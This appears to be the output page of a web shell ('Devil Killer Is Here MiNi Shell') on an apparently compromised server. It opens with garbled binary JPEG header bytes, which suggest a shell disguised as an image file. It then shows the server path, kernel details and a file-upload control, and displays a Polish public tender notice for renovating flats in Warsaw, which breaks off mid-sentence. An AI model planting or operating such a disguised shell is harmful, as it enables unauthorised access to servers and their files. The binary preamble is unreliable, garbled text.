JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231010/0043723101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> REMONT LOKALI MIESZKALNYCH POŁOŻONYCH NA TERENIE M.ST. WARSZAWY <br/>Z PODZIAŁEM NA TRZY CZĘŚCI (13 lokali) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WARSZAWSKIE CENTRUM INTEGRACJI &#34;INTEGRACYJNA WARSZAWA&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 386636718</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zofii Nałkowskiej 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-886</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">222775508</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp.wci@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">integracyjnawarszawa.bip.um.warszawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> działalność z zakresu pomocy społecznej, reintegracji społecznej i zawodowej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> REMONT LOKALI MIESZKALNYCH POŁOŻONYCH NA TERENIE M.ST. WARSZAWY <br/>Z PODZIAŁEM NA TRZY CZĘŚCI (13 lokali) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a20ba27c-6440-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00437231</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00006143/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont lokali mieszkalnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platforma.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">integracyjnawarszawa.bip.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy Pzp, za pośrednictwem elektronicznej platformy zakupowej (dalej: „Platforma”) pod adresem: https://platforma.eb2b.com.pl która spełnia wymagania opisane w art. 64 ustawy Pzp.<br/>2)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie Zakupowej. Zarejestrowanie <br/>i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.<br/>3)	Wymagania techniczne i organizacyjne korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej (dostępny pod adresem internetowym https://platforma.eb2b.com.pl/user/terms .<br/>4.	Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>4.1.1.	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej <br/>niż 4/1 mb/s,<br/>4.1.2.	komputer klasy PC lub lub Mac, o następującej konfiguracji: pamięć RAM min. 8 GB, procesor Intel IV 4GHz, jeden z systemów operacyjnych: MS Windows 7, Mac OS x 10.4, Linux, lub ich nowsze wersje,<br/>4.1.3.	zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer minimalnie wersja 11.0.<br/>4.1.4.	włączona obsługa JavaScript,<br/>4.1.5.	zainstalowany program obsługujący stosowane przez wykonawcę formaty plików (np. Acrobat Reader dla plików w formacie .pdf).<br/>5.	Wszelkie dokumenty, oświadczenia, informacje, o których mowa w SWZ, należy wczytać jako załączniki na Platformie, według Instrukcji korzystania z Platformy, dostępnej dla zalogowanych użytkowników w zakładce „Pomoc” – „Instrukcje”.<br/>6.	Zamawiający zaleca wczytywanie na Platformę plików w maksymalnym rozmiarze <br/>do 100 MB.<br/>7.	Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składające się na ofertę, składane są przez wykonawcę przy użyciu zakładki „Załączniki” w trakcie etapu składania ofert/wniosków.<br/>8.	Dokumenty elektroniczne, oświadczenia, uzupełnienia, elektroniczne kopie dokumentów lub oświadczeń składane przez wykonawcę po złożeniu ofert (np. na wezwanie zamawiającego), składane są przy użyciu zakładki „Pytania/informacje”.<br/>9.	Ewentualne wnioski o wyjaśnienie treści SWZ, itp. składane są przy użyciu zakładki „Pytania informacje”.<br/>10.	Zamawiający dopuszcza przesyłanie plików w formatach danych określonych <br/>w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. <br/>o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz. U. z 2017 r. poz. 570 z późn. zm.), tj. rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (t.j. Dz. U. z 2017 r. poz. 2247) – w szczególności w formatach: .pdf, .doc, .docx, .rtf lub .odt., xades.<br/>11.	Zamawiający zaleca przesyłanie plików w formacie .pdf.<br/>12.	Zalecenia zamawiającego odnośnie podpisu elektronicznego:<br/>1)	odnośnie kwalifikowanego podpisu elektronicznego:<br/>a)	dla dokumentów w formacie „pdf” zaleca się podpis w formatem PAdES,<br/>b)	dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES.<br/>2)	odnośnie podpisu osobistego:<br/>a)	dla dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny (otoczony),<br/>b)	dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym.<br/>3)	odnośnie podpisu zaufanego: <br/>wielkość dokumentów nie może przekraczać 10 MB, dostępny format podpisu „xml”.<br/>13.	Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wczytania do Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, w związku z art. 19 ust. 1 ustawy Pzp, Zamawiający informuje, że: <br/>1)	administratorem danych osobowych ujawnionych celem przeprowadzenia niniejszego postępowania jest Warszawskie Centrum Integracji „Integracyjna Warszawa”, z siedzibą w Warszawie (01-886), ul. Z. Nałkowskiej 11, zwane w dalszej części obowiązku informacyjnego „Centrum”;<br/>2)	Centrum powołało inspektora ochrony danych, z którym można się skontaktować poprzez email, pisząc na adres e-mail: iod.wci@um.warszawa.pl; <br/>3)	dane osobowe, podane Centrum przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO – w celu przeprowadzenia postępowania ws. udzielenia zamówienia publicznego, zgodnie z przepisami ustawy Pzp. Po zakończeniu postępowania, dane osobowe będą przechowywane w celach archiwalnych, przez okres 5 lat, zgodnie z ustawą o narodowym zasobie archiwalnym i archiwach, z zastrzeżeniem protokołu z postępowania, którego okres przechowywania przez Zamawiającego określa art. 78 ust. 1 ustawy Pzp (4 lata po zakończeniu postępowania);<br/>4)	odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania na podstawie art. 18 oraz art. 72 ust. 1 ustawy Pzp, a także ustawy o dostępie do informacji publicznej;<br/>5)	obowiązek podania danych osobowych jest związany z udziałem w postępowaniu o udzielenie zamówienia; konsekwencją niepodania określonych danych jest brak możliwości wybrania oferty;<br/>6)	w odniesieniu do danych osobowych podanych przez Wykonawcę, decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>7)	osoba, której dane podano w postępowaniu posiada:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych jej dotyczących, <br/>z tym zastrzeżeniem, że w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku Centrum może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu:<br/>−	sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania <br/>o udzielenie zamówienia publicznego (art.18 ust. 6 ustawy Pzp),<br/>−	sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. (art. 78 ust. 1 ustawy Pzp),<br/>b)	na podstawie art. 16 RODO prawo do sprostowania danych osobowych, z tym zastrzeżeniem, że:<br/>−	skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą (art. 18 ust. 6 ustawy Pzp),<br/>−	skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, <br/>o którym mowa w art. 16 RODO nie może naruszać integralności protokołu oraz jego załączników (art. 19 ust. 2 ustawy Pzp),<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora danych osobowych ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, że przetwarzanie danych osobowych jej dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8)	osobie, której dane podano w postępowaniu nie przysługuje:<br/>−	w związku z art. 17 ust. 3 lit. b i d RODO prawo do usunięcia danych osobowych,<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>−	na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania jego danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>9)	Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą;<br/>10)	Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>2.	Zamawiający informuje, ponadto że: <br/>1)	Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia obowiązku informacyjnego przewidzianego w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (art. 13 ust. 4)<br/>2)	Wykonawca zobowiązany jest wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje Zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa <br/>w art. 14 ust. 5 RODO.<br/>3)	W celu zapewnienia, że Wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku <br/>z udziałem Wykonawcy w postępowaniu, zobowiązuje się Wykonawcę do złożenia w treści oferty oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO (pkt 15 Formularza ofertowego).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WCI.ZP.26.2.15.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1 Część I zamówienia:<br/> <br/>L.p.	Adres lokalu<br/>1	Lokal mieszkalny położony w budynku mieszkalnym przy ul. Kobielska 88/92<br/>m 49/50 o powierzchni użytkowej 67,48 m2<br/> Remont kompleksowy<br/>2	Lokal mieszkalny położony w budynku mieszkalnym przy ul. Grochowska 154<br/>m 11 o powierzchni użytkowej 52,05 m2<br/> Remont kompleksowy<br/>3	Lokal mieszkalny położony w budynku mieszkalnym przy ul. Radziłowskiej 8 m 3 <br/> o powierzchni użytkowej 45,92 m2 <br/>Montaż ogrzewania elektrycznego , montaż prostej zabudowy kuchennej<br/>4	Lokal mieszkalny położony w budynku mieszkalnym przy ul. Zwycięzców 35 m 2 <br/> o powierzchni użytkowej 61,80 m2 <br/> Montaż prostej zabudowy kuchennej <br/><br/>Wspólny Słownik Zamówień : <br/> Kod CPV 45211341-1 Remont lokali mieszkalnych<br/> 45440000-3 - Roboty malarskie i szklarskie<br/> 45430000-0 - Pokrywanie podłóg i ścian<br/> 45420000-7 - Roboty w zakresie zakładania stolarki budowlanej <br/> 45332000-3 - Roboty instalacyjne wodne i kanalizacyjne<br/> 45311200-2 - Roboty w zakresie instalacji elektrycznych<br/><br/>1.1.1 Przedmiot postępowania dla I części zamówienia obejmuje wykonanie następujących robót budowlanych:<br/>a)	roboty rozbiórkowe<br/>b)	wymiana stolarki okiennej,<br/>c)	wymiana stolarki drzwiowej,<br/>d)	Wymiana posadzek,<br/>e)	roboty murowe i tynkarskie,<br/>f)	roboty glazurnicze,<br/>g)	roboty malarskie<br/>1.1.2	W zakres podstawowych robót sanitarnych wchodzą nw. roboty:<br/>a)	demontaż urządzeń sanitarnych<br/>b)	wymiana osprzętu<br/>c)	roboty instalacyjne<br/>d)	roboty hydrauliczne<br/>e)	pomiary szczelności instalacji<br/>1.1.3	W zakres podstawowych robót elektrycznych wchodzą nw. roboty :<br/>a)	wymiana instalacji elektrycznej <br/>b)	wymiana osprzętu elektrycznego<br/>c)	wymiana tablic<br/>d)	pomiary elektryczne<br/>e)	sporządzenie dokumentacji dla zakładu energetycznego<br/>1.1.4.	Inne roboty towarzyszące, związane z technologią poszczególnych branż robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45211340-4 - Roboty budowlane w zakresie budownictwa wielorodzinnego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena oferty brutto ( C ) - waga kryterium – 60% <br/>2) okres gwarancji ( G) – waga kryterium - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.2	Część II zamówienia:<br/>L.p.	Adres lokalu<br/>1 Lokal mieszkalny położony w budynku mieszkalnym przy<br/> ul. E. Gibalskiego 1m 9 o powierzchni użytkowej 35,35m2 <br/> Remont kompleksowy <br/>2	Lokal mieszkalny położony w budynku mieszkalnym przy<br/> ul. Grzybowskiej 90 m 15 o powierzchni użytkowej 28,89 m2<br/> Remont kompleksowy <br/>3	Lokal mieszkalny położony w budynku mieszkalnym przy <br/>ul. Młynarskiej 27A m 9 o powierzchni użytkowej 27 m2<br/>Remont kompleksowy<br/>4	Lokal mieszkalny położony w budynku mieszkalnym przy<br/> ul. Zwycięzców 4a m 9 <br/> Wymiana okien<br/>5	Lokal mieszkalny położony w budynku mieszkalnym przy<br/> ul. Świętosławskiej 35 m 2 <br/>Wymiana okien<br/>Wspólny Słownik Zamówień : <br/>Kod CPV 45211341-1 Remont lokali mieszkalnych <br/> 45440000-3 - Roboty malarskie i szklarskie<br/>45430000-0 - Pokrywanie podłóg i ścian<br/>45420000-7 - Roboty w zakresie zakładania stolarki budowlanej <br/>45332000-3 - Roboty instalacyjne wodne i kanalizacyjne<br/>45311200-2 - Roboty w zakresie instalacji elektrycznych<br/>1.2.1	Przedmiot postępowania dla II części zamówienia obejmuje wykonanie następujących robót budowlanych:<br/>a)	roboty rozbiórkowe<br/>b)	wymiana stolarki okiennej,<br/>c)	wymiana stolarki drzwiowej,<br/>d)	Wymiana posadzek,<br/>e)	roboty murowe i tynkarskie,<br/>f)	roboty glazurnicze,<br/>g)	roboty malarskie.<br/>1.2.2	W zakres podstawowych robót sanitarnych wchodzą nw. roboty:<br/>a)	demontaż urządzeń sanitarnych,<br/>b)	wymiana osprzętu,<br/>c)	roboty instalacyjne,<br/>d)	roboty hydrauliczne,<br/>e)	pomiary szczelności instalacji.<br/>1.2.3	W zakres podstawowych robót elektrycznych wchodzą nw. roboty :<br/>a)	wymiana instalacji elektrycznej,<br/>b)	wymiana osprzętu elektrycznego,<br/>c)	wymiana tablic,<br/>d)	pomiary elektryczne,<br/>e)	sporządzenie dokumentacji dla zakładu energetycznego.<br/>1.2.4	Inne roboty towarzyszące, związane z technologią poszczególnych branż robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45211341-1 - Roboty budowlane w zakresie mieszkań</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena oferty brutto ( C ) - waga kryterium – 60% <br/>2) okres gwarancji ( G) – waga kryterium - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów 